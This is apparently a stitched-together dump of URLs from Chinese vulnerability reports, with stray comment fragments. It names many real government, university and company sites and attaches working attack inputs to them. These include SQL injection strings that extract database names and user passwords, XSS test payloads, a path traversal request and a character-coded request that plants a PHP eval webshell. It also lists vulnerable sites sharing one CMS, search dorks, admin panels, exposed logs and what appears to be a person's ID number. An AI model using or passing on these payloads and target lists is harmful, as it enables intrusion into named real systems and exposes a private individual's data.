http://m.cndns.com/default.aspx http://old.chinacourt.org/zhuanti1/yinglie/area.php?area_id=C%27%20and%20%271%27=%271 http://old.chinacourt.org/zhuanti1/yinglie/area.php?area_id=C%27%20and%20%271%27=%272 http://old.chinacourt.org/zhuanti1/yinglie/person.php?info_id=8%27%20and%20%271%27=%271 http://old.chinacourt.org/zhuanti1/yinglie/person.php?info_id=8%27%20and%20%271%27=%272 www.zjsxjt.gov.cn/portal/article_list_zzjg.jsp?catalog_id=20070319000056 http://gzmis.jtfb.gov.cn:7001/console/ http://www.9wee.com/index.php?ac=selvote&app_id=102%20AND%203*2*1%3d6%20AND%2060%3d61&ctl=game&random=0.9856553943827748 https://183.224.236.27:8443/ims/html/index.jsp http://www.jszg.cq.cn/Jg.Asp?ID=22 http://www.jsjtw.gov.cn//plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user http://www.jsjtw.gov.cn/admin_beta/login.asp http://www3.gxu.edu.cn/jjjch http://cn-admin.longtugame.com/c-other_support/reply?qid=10432 https://58.48.109.231 http://218.16.125.98:8081/Ftp/Pic/2014-10/ http://218.16.125.98:8081/Ftp/Pic/2014-08/2014-08-29/769956/ http://218.16.125.98:8081/Ftp/Pic/2014-08/2014-08-29/ http://218.16.125.98:8081/Ftp/Pic/2014-09/ http://218.16.125.98:8081/Ftp/Pic/2014-10/ http://www.sdgem.gov.cn/Article_Class2.asp?ClassID=48 www.invest-zibo.gov.cn:7080/jmx-console/wuyun.txt http://zjshyj.zjwater.gov.cn/SJXLY/userLogin.aspx http://www.slssoft.com/ http://baike.baidu.com/view/5222614.htm?fr=aladdin http://oa.isoffice.cn/ http://www.slssoft.com/Web/Index/WebDetail/customer http://oa.isoffice.cn/syssetinfo/statusrecordpage.aspx?userid=test http://www.dianyingtongji.cn/Common/getdate.asp?datasp=asd%22/%3E%3Cbody/onload=alert%281%29%3E http://www.dianyingtongji.cn/hy_index/notify.asp http://xj.wenweipo.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20union%20%20%20select%201,2,3,4,5,user%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23 http://platform.enavi.118114.cn:8081/TYCountProject/ http://platform.enavi.118114.cn:8081/TYCountProject/MobileAction?action=select http://platform.enavi.118114.cn:8081/TYCountProject/mobile/edit.jsp?index=5 www.tiandy.com www1.tiandy.com www2.tiandy.com http://www.tiandy.com/index.php/Society/show/?sid=24 http://cee.xmu.edu.cn http://cee.xmu.edu.cn/admin/AdminLogin.aspx http://www.zoheng.net/)开发的某套CMS程序用于多数网站,并且存在同一注入漏洞 inurl:Message.php http://www.dingor.cn/Message.php?ac=MsgSave http://www.ahtiansen.com/Message.php?ac=MsgSave http://www.ahxz.com.cn/Message.php?ac=MsgSave http://www.ys-machine.com/Message.php?ac=MsgSave http://www.jiaxinmed.com/En/Message.php?ac=MsgSave http://www.tcluqiao.com/Message.php?ac=MsgSave http://www.ahlsjt.com/Message.php?ac=MsgSave http://www.tcdbzx.com/Message.php?ac=MsgSave http://www.tcslj.gov.cn/Message.php?ac=MsgSave http://www.jm-88.com/Message.php?ac=MsgSave http://www.ahzhichuan.com/Message.php?ac=MsgSave http://www.ahccm.com/Message.php?ac=MsgSave http://www.cn-yf.com/Message.php?ac=MsgSave http://www.djjshg.com/Message.php?ac=MsgSave http://www.tcedz.gov.cn/Message.php?ac=MsgSave http://www.longteng.gov.cn/message.php?ac=MsgSave http://www.jsqingqing.com/Message.php?ac=MsgSave http://www.ahguangyuan.com/Message.php?ac=MsgSave http://www.ahopty.com/Message.php?ac=MsgSave http://www.ahtc119.com/Message.php?ac=MsgSave http://www.ahhyym.com/Message.php?ac=MsgSave http://server1.cdce.cn http://server1.cdce.cn/student/login/RegisterAppeal.aspx?studentnumber=13208110129051&CrtificateNumber=430527199110124249&NetSchoolID=49 http://adm.anjuke.com/login.action http://optools.anjuke.com/哦 http://dwxy.hfut.edu.cn/jgszfl.php?nid=295 http://www.lshrss.gov.cn/ask/search.asp http://www.sq123.net.cn/ inurl:newsdisp.asp http://www.hzgs.gov.cn/ZWGK/zfxx/zfxi/SmallClass.asp?BigClassName=%CA%D0%BE%D6&SmallClassName=%CA%D0%BE%D6%27+and+%27f%27%3D%27f http://www.tcl.com/Investors/investorslist.html?tid=1 http://lighting.tcl.com/cn/news-d.aspx?ID=410&SortID=80 http://battery.tcl.com/read_job.php?id=38 http://www.tcl.com/Investors/investorslist.html?tid=1 http://www.izhancms.com/ http://demo9.izhancms.com/category/Category/list/cid/4伪静态?果断还原,如下:http://demo9.izhancms.com/category/Category/list?cid=4 http://demo9.izhancms.com/category/Category/list?cid=4%20%29%20UNION%20ALL%20SELECT%201,2,3,4,5,6,CONCAT%280x23,DATABASE%28%29,0x23%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23 http://www.nbzytech.com/)开发的某套CMS程序用于多数网站,遗漏了一个注入。 http://www.pinnacles.cc/cn/products.php?tid=3 http://www.china-south.net/cn/products.php?tid=15 http://www.angricht.com/cn/products.php?tid=54 http://www.beifa.com/cn/products.php?tid=98 http://www.chinafirs.com/products.php?tid=1 http://www.mamabebe.cn/cn/products.php?tid=8 http://www.cn-moeller.com/cn/products.php?tid=14 http://www.3wen365.com/cn/products.php?tid=25 http://www.yourlonglighting.com/cn/products.php?tid=39 http://www.blxinyu.com/products.php?tid=4 http://www.austinelec.com/cn/products.php?tid=9 http://www.nbopen.net/products.php?tid=30 http://www.nbxjqd.com/cn/products.php?tid=1 http://www.jinhenglihe.com/products.php?tid=36 http://www.nbbhqy.com/cn/products.php?tid=2&page=2 http://www.nbxxmc.com/cn/products.php?tid=3 http://www.nbyuandian.com/cn/products.php?tid=3 http://www.nbnyjx.com/products.php?tid=17 http://www.xishisw.com/cn/products.php?tid=2 http://test.nbzytech.com/hongxuan/cn/products.php?tid=3&page=3 http://www.cicidz.com/cn/products.php?tid=5 http://www.shengyate.com/cn/products.php?tid=30 http://www.nbxhjd.com/products.php?tid=8 http://www.nbgfsg.com/cn/products.php?tid=1 http://www.npjet.com/products.php?tid=2 http://www.nbmkty.com/cn/products.php?tid=11 http://www.nbdayue.com/cn/products.php?tid=3 http://www.nbqhhl.com/cn/products.php?tid=5 http://www.krosor.com/cn/products.php?tid=8 http://116.255.234.15 http://soft0371.com/ http://116.255.234.15:8080/ http://dg.uninx.com:8481/cms/cms_iindex.php http://www.xianglianai.cn/)旗下的“找对象”这款app下载量居然第一,比第二名世纪佳缘多一倍多。是我好久没上网找过对象out了么? http://mds.music.sina.com.cn/login/login http://info.swyaoce.com/login.aspx http://www.ums86.com/ http://wenku.baidu.com/link?url=UAxsPIr3meNd8QOFLQ-UaoBPrdGbA0X5_7X-oq5QJqq9cyNFdKZGEed4T-fjmp_AABgHGBDfXj1srqkatqCCUzPRA4zjUkhNgfQRW31Mmxu http://www.ums86.com/pages/retrieveMotifyPass.jsp?spCode=101234 http://210.39.2.57/account/login.do http://www.cloud511.com/case http://www.zjrrt.com/getHelpContent.do?classId=242 http://www.ewj2009.com/getHelpContent.do?classId=13 http://www.nbzyyy.com/getHelpContent.do?classId=87 http://test.hzyibai.com/getHelpContent.do?classId=342 http://www.zjtydyf.com/getHelpContent.do?classId=288 http://leisuredak.com/getHelpContent.do?classId=82 http://www.yizheng.cc/getHelpContent.do?classId=11 http://jylbx.com/getHelpContent.do?classId=333 https://100offer.com/company_list?l=A https://tms.samsung.com.cn/SCIC_TMS/loginIndex.do inurl:class.php?class= http://hope.sdydf.gov.cn/class.php?class=1 http://www.friendshippencil.com/class.php?class=6 http://www.huadecheng.com/class.php?class=48 http://www.htfp.cn/class.php?class=6 http://www.zqyl.org.cn/class.php?class=2 http://www.shanshida.org/class.php?class=38 http://hope.sdydf.gov.cn/class.php?class=2 http://www.sdtbly.com/class.php?class=24 http://yushengyi.com/class.php?class=3 http://218.57.10.104/class.php?class=10&orderby=&page=2 http://sdzxgsdzgy.com/class.php?class=5 http://www.kuayueyingshi.com/class.php?class=16 http://xfysteel.com/class.php?class=3 http://www.netrc.org.cn/class.php?class=26 http://www.sdqlfc.com/class.php?class=21 http://www.jntsdgc.com/class.php?class=48 http://www.258home.cn/class.php?class=15 http://山东张夏-崮山地质公园.com/class.php?class=8 http://221.204.19.2/IOS/portal!manage.do http://www.gdsmd.cn/ps_show.php?id=12 www.xiaoxiaodaomin.com/space.php?do=gift&giftid=1&view=song www.xiaoxiaodaomin.com/space.php?do=anime&id=160&imgid=1&types=&view=cartoon_imagesview www.xiaoxiaodaomin.com/space.php?do=gift&order=nums&types=credit&userid=1&view=song www.xiaoxiaodaomin.com/space.php?do=gift&types=beans&userid=1&view=song www.xiaoxiaodaomin.com/space.php?do=pnotice&id=1 http://180.149.158.9/login_prelogin.action http://180.149.158.9/haha.jsp http://www.tsmzj.gov.cn:8012/printpage.asp?ArticleID=13423 http://www.bbsti.gov.cn/bbsti_news/Admin_Login.asp http://www.bbsti.gov.cn/bbsti_news/printpage.asp?ArticleID=51232 http://www.hbst.gov.cn/admin/ http://demo.cms.bookinge.com/install/index.php?step=5,因为这步会进行安装,重写数据库,以免给厂商带来麻烦~~ http://xx.gxufl.com:82 http://xx.gxufl.com:82/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 www.ahosta.gov.cn http://**.**.** http://**.**.**/login/ http://**.**.** http://www.xianyz.com/kytj/login.asp http://www.zzczj.gov.cn/ShowArticle.aspx?Id=110104000000000 http://www.zzczj.gov.cn/ShowAr http://sqlmap.org http://htfp.cn/count.php?id=2 http://htfp.cn/content.php?id=79 http://htfp.cn/class.php?class=2 http://www.china-jialifang.com/class.php?class=8 http://www.china-jialifang.com/content.php?id=4 http://www.china-jialifang.com/search.php?=88952634 http://www.china-jialifang.com/count.php?id=4 http://www.friendshippencil.com.cn/content.php?id=73 http://www.friendshippencil.com.cn/class.php?class=2 http://www.friendshippencil.com.cn/count.php?id=73 http://www.huadecheng.com/content.php?id=52 http://www.huadecheng.com/class.php?class=11 http://www.huadecheng.com/count.php?id=52 http://en.friendshippencil.com/class.php?class=2 http://en.friendshippencil.com/content.php?id=68 http://en.friendshippencil.com/count.php?id=68 http://www.xfysteel.com/class.php?class=8 http://www.xfysteel.com/content.php?id=9 http://www.xfysteel.com/count.php?id=9 http://www.zqyl.org.cn/class.php?class=1 http://www.zqyl.org.cn/content.php?id=3290 http://www.zqyl.org.cn/count.php?id=3290 http://hope.sdydf.gov.cn/class.php?class=1 http://hope.sdydf.gov.cn/count.php?id=2 http://hope.sdydf.gov.cn/content.php?id=2 http://www.dxscg.org/content.php?id=11089 http://www.dxscg.org/class.php?class=1 http://www.dxscg.org/count.php?id=11089 http://www.kuayueyingshi.com/count.php?id=71 http://www.kuayueyingshi.com/class.php?class=7 http://www.kuayueyingshi.com/content.php?id=71 http://www.s88c.com/)二次开发的PHPWEB http://www.yndht.com/news/class/index.php?myord=1 http://www.kmxkgc.com/news/class/index.php?myord=1 http://www.kmynf.com/news/class/index.php?myord=1 http://www.kefuan.com/news/class/index.php?myord=1 http://kmzhiyang.com/news/class/index.php?myord=1 http://www.yndimai.com/news/class/index.php?myord=1 http://www.ynyuntong.com/news/class/index.php?myord=1 http://www.123shuxue.com/news/class/index.php?myord=1 http://www.ynchengtai.com/news/class/index.php?myord=1 http://www.nvshendong.com/news/class/index.php?myord=1 http://kmdbjd.com/news/class/index.php?myord=1 http://昆明公司注册.com/news/class/index.php?myord=1 http://www.kmjunding.com/news/class/index.php?myord=1 http://wkrhy.com/news/class/index.php?myord=1 http://www.ynbkhb.com/news/class/index.php?myord=1 http://www.ynquanlan.com/news/class/index.php?myord=1 http://qjkld.com/news/class/index.php?myord=1 http://www.svnchina.com/project_open.php?order=username&rank=DESC http://geoscience.hfut.edu.cn/lab/ceshi.php?s=1 http://www1.gdufs.edu.cn/gwyjs/yjsc/articleList.php?classid=7 http://zjcq3.g.pps.tv/360bak/mj/pay/paylog.log http://zjcq3.g.pps.tv/pps/mj/pay/paylog.log http://zjcq3.g.pps.tv/pps/mj/.svn/entries http://demo.74cms.com/ inurl:showservices.asp?id= http://www.tswsj.gov.cn/admin http://www.tswsj.gov.cn/printpage.asp?ArticleID=15212 http://www.wcb.yn.gov.cn:8080/Default.aspx http://www.aqqcyp.com/products_see.asp?did=3957 http://www.aqqcyp.com/products.asp?Big=204 http://www.aqqcyp.com/news_view.asp?big=81&Id=304 http://www.aqqcyp.com/news.asp?big=81 http://www.z2hospital.com/cms/Article.aspx?NRID=18260 http://www.z2hospital.com/cms/Default.aspx http://www.z2hospital.com/cms/Article.aspx?NRID=18260 http://www.zhuqu.com/idea/55853.html?imgId=55853& http://www.zhuqu.com/idea/55853.html?imgId=55853& http://bbs.qianyun.cn/forum.php http://wooyun.org/bugs/wooyun-2014-074668 http://www.mengtianmy.com/abouts.php?id=1 http://www.bjcrmy.com/abouts.php?id=1 http://www.bjsammy.com/abouts.php?id=1 http://www.bjgcsf.com/abouts.php?id=1 http://www.bjrxhsmy.com/abouts.php?id=1 http://www.bjjfjmy.com/abouts.php?id=1 http://www.myczmy.com/abouts.php?id=1 http://www.bjjkamy.com/abouts.php?id=1 http://www.bjdishang.com/abouts.php?id=4 http://www.bjhyfd.net/abouts.php?id=3 http://www.bjdasmc.com/abouts.php?id=1 http://www.yrstmy.com/abouts.php?id=1 http://www.sanhuanmuye.com/abouts.php?id=1 http://www.bjddhxmy.com/abouts.php?id=1 http://nbhjmy.com/abouts.php?id=1 http://www.bjafkr.com/abouts.php?id=1 http://www.ushangmm.com/abouts.php?id=3 http://www.junximuye.com/abouts.php?id=1 http://star.lvshou.com/thinkdglist/Default.aspx?NewsClass_ID=200&page=1 http://www.xplus.com/ http://e.myrb.net/www/index.php?mod=index&con=user&act=login http://news.xd56b.com/www/index.php?mod=index&con=user&act=login http://smrb.smnet.com.cn/www/index.php?mod=index&con=user&act=login http://szrb.sz-news.com.cn/www/index.php?mod=index&con=user&act=login http://epaper.hilizi.com/www/index.php?mod=index&con=user&act=login http://epaper.fzen.com.cn/www/index.php?mod=index&con=user&act=login http://www.wkdty.com/news/news_detail.php?news_id=239 http://www.kanglesoft.com/partner.php?id=2.6.6%27&version=2.6.6 http://find.cb.cnki.net/index.html cookie:AdminName=admin http://zhudizhuangshi.com/newsDetail.asp?id=10 http://szhylaw.com/newsDetail.asp?classID=3&id=76 http://www.haoshilaijz.com/newsDetail.asp?id=9 http://www.bjshijishunye.com/NewsDetail.asp?id=26 http://www.china-nfgk.com/newsDetail.asp?id=86 http://www.szkaiping.com/newsDetail.asp?id=56 http://www.elevbalanced.com/newsDetail.asp?id=52 http://www.szxysnhj.com/newsDetail.asp?id=21 http://www.cnlinson.com/newsDetail.asp?id=71 http://www.szlijin.com/newsDetail.asp?id=54 http://jwc.jnu.edu.cn/Result.asp http://www.infosea.com.cn/yonghu.html(有点吓人) http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://www.xxxxx.com:port/theme/2009/login_port.asp http://www.fjhi.gov.cn/templates/download.jsp?path=download.jsp http://www.izhancms.com/ http://demo9.izhancms.com/content/Content/index/id/10伪静态?果断还原,如下:http://demo9.izhancms.com/content/Content/index?id=10 http://www.zving.com/ http://szxiexie.com/ http://www.0512wld.com/caseDetail.asp?classID=2&id=1 http://szhylaw.com/caseDetail.asp?classID=2&id=1 http://www.youyazx.com/caseDetail.asp?id=10 http://csbrick.com/caseDetail.asp?id=23 http://www.szdingzhu.com/caseDetail.asp?id=53 http://rambo8.com/caseDetail.asp?id=2 http://www.bjshijishunye.com/caseDetail.asp?id=1 http://www.youyazx.com/caseDetail.asp?id=1 http://www.shentongjx.com/honorDetail.asp?id=26 http://www.sz-yxsbaz.com/honorDetail.asp?id=14 http://www.0512wld.com/honorDetail.asp?id=14 http://www.0512wld.com/service.asp?classid=9 http://www.t-color.com.cn/service.asp?classid=1 http://www.kouchijz.com/childrendetail.asp?id=16 http://szhylaw.com/childrenDetail.asp?classID=1&id=21 http://zhudizhuangshi.com/newsDetail.asp?id=10 http://szhylaw.com/newsDetail.asp?classID=3&id=76 http://www.haoshilaijz.com/newsDetail.asp?id=9 http://www.bjshijishunye.com/NewsDetail.asp?id=26 http://www.china-nfgk.com/newsDetail.asp?id=86 http://www.szkaiping.com/newsDetail.asp?id=56 http://www.elevbalanced.com/newsDetail.asp?id=52 http://www.szxysnhj.com/newsDetail.asp?id=21 http://www.cnlinson.com/newsDetail.asp?id=71 http://www.szlijin.com/newsDetail.asp?id=54 http://szhylaw.com http://center.smesd.gov.cn/site/guanlizixun/companyview.jsp?id=2764一跑就知道 http://js.189.cn/emall/ http://3gdr.yn.189.cn/ http://211.100.37.152/imagetext/writting-list.do http://find.cb.cnki.net/index.html http://find.cb.cnki.net/index.html www.rsks.sdrs.gov.cn时nslookup了一下,得到地址218.56.49.7,查看218.56.49.1开放23号端口,尝试默认用户名admin https://ebank.bankofbeijing.com.cn/bccbpb/downloadBJCA/bjcaotp.exe http://www.17ugo.com/user.php?act=order_detail&no=719830&flag=1 http://www.17ugo.com/user.php?act=order_detail&no=719811&flag=1 http://www.17ugo.com/user.php?act=order_detail&no=11&flag=1 http://ycjg.jsfda.gov.cn/openfireweb/ http://www.szzel.com/product.asp http://www.yunyvision.com/case.asp http://www.yunyvision.com/case.asp www.szzel.com/ www.shcwine.com www.yunyvision.com www.xiangshanmall.com www.cipon.net www.qmgg.com.cn www.oulang.net www.asieris.cn www.lemsz.com www.sunrous.com www.jsyl155.com www.sz-sjbx68.com www.txjybg.com www.szwsxn.com www.szxyyt.com www.txbjnjb.com http://210.45.192.200/这个服务器上面, http://210.45.192.200/xsh/admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.asp http://210.45.192.200/xsh/admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.asp"method=post http://www.nenter.com.cn/newsdetail.php?id=16 http://www.hbaoge.com/newsdetail.php?id=1 http://www.sun-chem.com/newsdetail.php?id=5 http://www.borui-chem.com/newsdetail.php?id=4 http://www.ahknchem.com/newsdetail.php?id=1 http://www.ablexn-chem.com/newsdetail.php?id=2 http://www.shhcchem.com/newsdetail.php?id=102 http://www.huiqianchem.com/newsdetail.php?id=1 http://www.dlanchem.com/newsdetail.php?id=15 http://www.hongrunchem.net/newsdetail.php?id=1 http://www.coolbiotech.com/newsdetail.php?id=2 http://www.checopharma.com/newsdetail.php?id=1 http://www.hfnhsw.com/newsdetail.php?id=4 http://117.79.153.227/newsdetail.php?id=1 http://www.crstpharma.com/newsdetail.php?id=1 http://www.woyouchem.com/newsdetail.php?id=1 http://portal.taijiang.gov.cn/ http://www.yy8080120.com/html/SearchList.aspx?txtTitle=1 http://www.aisida.cn/)开发的某套CMS程序用于多数网站,并且存在同一注入漏洞 http://www.djdsh.com/cp1.php?sid=3 http://www.ykzdsy.com/cp1.php?sid=20 http://www.typump.com/cp1.php?sid=7 http://www.bena-china.com/cp1.php?sid=2 http://www.dsqzxyy.com/cp1.php?sid=3 http://www.ykqyjt.com/cp1.php?sid=11 http://www.ningfeng.net/cp1.php?sid=7 http://www.ykyly.com/cp1.php?sid=3 http://www.ykytsh.com/cp1.php?sid=5 http://www.gl-piano.com/cp1.php?sid=14 http://www.ykycdz.com/cp1.php?sid=5 http://www.ykyyqh.com/cp1.php?sid=2 http://www.ykshydl.com/cp1.php?sid=16 http://www.pjgl.com/cp1.php?sid=6 http://www.gjjmy.cn/cp1.php?sid=38 http://www.ykdayou.com/cp1.php?sid=8 http://www.ykdhh.com/cp1.php?sid=19 http://www.ykhyqb.com/cp1.php?sid=3 http://huodong.hiwifi.com/hiservice/default/lottery https://wb.chsi.com.cn/apply/res.jsp?bmh=420498202 http://www.maipu.cn/productmes.aspx?id=2266 https://url/system/maintenance/export.php?type=sc https://122.224.165.114/login.html https://119.4.164.42/login.html https://61.143.203.86/login.html http://www.gzyongtuo.com/ inurl:Product.php?ClassID= http://www.xxxxxx.com/ytadmin/login.php http://www.byshanfang.com/Product.php?ClassID=2 http://www.chjunhui.com/Product.php?ClassID=9 http://www.gzchangrun.com/Product.php?ClassID=4 http://www.gz-hongwei.com/product.php?ClassID=4 http://gdwqgovcn.gotoip3.com/Product.php?ClassID=2&page=2 http://www.chshuxie.com/product.php?nid=6 http://www.chdigao.com/Product.php?ClassID=3 http://www.chjingang.com/Product.php?ClassID=1 http://www.gzsongxiang.com/Product.php?ClassID=1 http://www.chbsxc.cn/Product.php?ClassID=6 http://gdwqbg.cn/Product.php?ClassID=5 http://gdwqbg.com/Product.php?ClassID=3 http://www.huibang88.com/Product.php?ClassID=2 http://www.byshanfang.com/ShowPro.php?id=65 http://www.chjunhui.com/ShowPro.php?id=2 http://www.conghuakx.com/showpro.php?id=26 http://www.chjingang.com/ShowPro.php?id=21 http://www.gzsongxiang.com/ShowPro.php?id=41 http://www.chbsxc.cn/ShowPro.php?id=7 http://www.qiaotour.com/ShowPro.php?id=404 http://www.huibang88.com/ShowPro.php?id=46 http://www.huibang88.com/ShowPro.php?id=46 http://www.gzchangrun.com/Product.php?ClassID=4 http://wooyun.org/bugs/wooyun-2014-079654 http://bbs.5173.com/admin.php http://www.msxl.pte.sh.cn/ http://www.msxl.pte.sh.cn/webschool/MySpace/ http://www.hiidc.net/ inurl:wz_show.asp?NewsId= inurl:wz_show.asp?NewsId= http://www.gxhbj.gov.cn/wz_show.asp?NewsId=4020 http://www.gzcgj.com.cn/wz_show.asp?NewsID=9076 http://gzzyy.hiidc.net/wz_show.asp?NewsId=4213 www.jxsgzszyy.cn/wz_show.asp?NewsId=4321 http://www.hydbw.com/wz_show.asp?NewsID=7502 http://www.txcm.com.cn/wz_show.asp?NewsId=4677 http://www.xtsqw.com/wz_show.asp?NewsId=4825 http://www.gzswx.org/wz_show.asp?NewsID=4630 http://www.gemeizs.com/wz_show.asp?NewsId=4419 http://hainanrfb.gov.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments http://job.hfuu.edu.cn/ http://job.hfuu.edu.cn//batch.common.php?action=modelquote&cid=1&name=spacecomments http://blog.czdj.gov.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments http://life.qibosoft.com/coupon/s.php http://t.nmgtv.cn/ss/batch.common.php?action=modelquote&cid=1&name=spacecomments http://aero-mech.tongji.edu.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments http://xcb.cqu.edu.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments http://www.ccsfu.edu.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments http://www.jgxt.gov.cn/admin/login.aspx inurl:vipchat filetype:jsp http://dd.xdcms.cn http://dd.xdcms.cn/index.php?m=member&c=order&f=order_show&id=109 http://www.grad.ldu.edu.cn/bigclass.asp?bigclassname=%E5%AD%A6%E7%A7%91%E5%BB%BA%E8%AE%BE&BigClassType=1 http://www.xxgk.fy.gov.cn/News_xxgktl.asp?d_id=85 http://www.qdjtx.com/job.php?mode=detail&id=4 http://www.xdl-china.com/job.php?mode=detail&id=5 http://www.aoshihr.com/job.php?mode=detail&id=20 http://www.qdxcfj.com/job.php?mode=detail&id=2 http://www.shanhaitian.com/job.php?mode=detail&id=6 http://www.qingyuan7.com/job.php?mode=detail&id=8 http://www.qdjiarun.net/job.php?mode=detail&id=3 http://www.springmagnet.com/job.php?mode=detail&id=15 http://www.haizhoutd.com/job.php?act=detail&id=2 http://www.qdaobo.cn/job.php?mode=detail&id=5 http://www.qdhzy.com/job.php?mode=detail&id=2 http://www.qingdaozhongzhixin.com/zhongxin/job.php?mode=detail&id=3 http://www.water-green.com/job.php?act=detail&id=16 http://www.haohexinxing.com/job.php?act=detail&id=2 http://www.qdkqwy.com/job.php?action=detail&id=26 http://www.ykghjc.com/cp.php?sid=7 http://www.ykpf.com/cp.php?sid=5 http://www.dsqzxyy.com/cp.php?sid=4 http://www.htcopipe.com/cn/cp.php?sid=12 http://www.kzsny.com/lsnysfx/cp.php?sid=1 http://www.ykard.com/cp.php?sid=3 http://www.byqzxyy.com/cp.php?sid=5 http://www.jzbyk.com/cp.php?sid=11 http://ykchjd.com/cp.php?sid=5 http://www.yk148.com/qzlx/cp.php?sid=13 http://www.ykpipe.com/cp.php?sid=5 http://www.silbermannpiano.cn/cp.php?sid=4 http://www.bohai-machine.com/cn/cp.php?sid=89 http://www.yktcm.com/cp.php?sid=2 http://www.yingli.cc/cn/cp.php?sid=8 http://www.ykzdsy.com/cp.php?sid=14 http://www.ykqyjt.com/cp.php?sid=6 http://www.ykrunda.com/cp.php?sid=1 http://www.yklhlc.com/cp.php?sid=5 http://www.yxdqm.com/cp.php?sid=17 http://www.0769net.com/index.html http://www.95c.com.cn/ http://demo.95c.com.cn http://work.ch.gongchang.com/product/index/del http://www.cfsafety.gov.cn/e/admin/index.aspx http://www.youngpeak.com.cn/ http://www.ztehotel.com/mobile/mhotelgen.aspx?id=ZTE001 http://im.sina.com.cn/report.php?fid=4c96bc94d582b&token=xTbWzvB1&filename=111%22%3E%3Cscript%3Ealert%281%29%3C/script%3E%3C!-- http://www.eyeinn.com/ http://www.luopan.cn/partner-category-grouppms http://www.ltt-hna.com/Index/PasswordBack.aspx http://xxgk.jinan.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/download/downannals.jsp?name=....//....//zfxxgk/subjectstyle.xml&webid=52&type=41&downname=a.txt http://www.wintour.cn/ http://www.skyland-hotel.com/ http://www.holliyardhotel.com/ http://www.chinagongshe.com/ http://www.lyhotspring.com/ http://www.tfsunshinehotel.com/ http://www.singwood.com.cn/ http://www.rhgresorts.com/ http://www.btghotels.com/ http://www.hotelsjianguo.com/ http://www.dytchengdu.com/ http://www.baronyhotels.com/ http://www.ouyahotels.com/ http://www.hnsunshinegroup.com/ http://cndhotels.com/ http://www.gdhhotels.com/ http://www.dolton-hotels.com/ http://www.aoyuanhealthhotel.com/ http://www.krdhotel.com/ www.eversunshinehotel.com/ http://www.kuntairoyalhotel.com/ http://www.oceanhotel.com.cn/ http://www.mandarinhotelgd.com/get_password.html http://www.xingdingan.com/get_password.html http://www.sanyabarry.com/get_password.html http://www.aoyuanhealthhotel.net/special_offer_3.html http://www.mqjgz.cn/get_password.html http://www.ksnewporthotel.com/get_password.html http://mandarin-hotel.com.cn/get_password.html http://hy.yingwu.com.cn/get_password.html http://www.ebdh-hotel.com/get_password.html http://www.joyahotel.com.cn/get_password.html http://www.eco-hotel.com.cn/get_password.html http://www.easelandhotel.com/get_password.html http://www.aihotel.com/get_password.html http://www.guishanhotel.com/get_password.html http://www.ramadaplazagz.com/get_password.html http://www.qsshotel.com/get_password.html 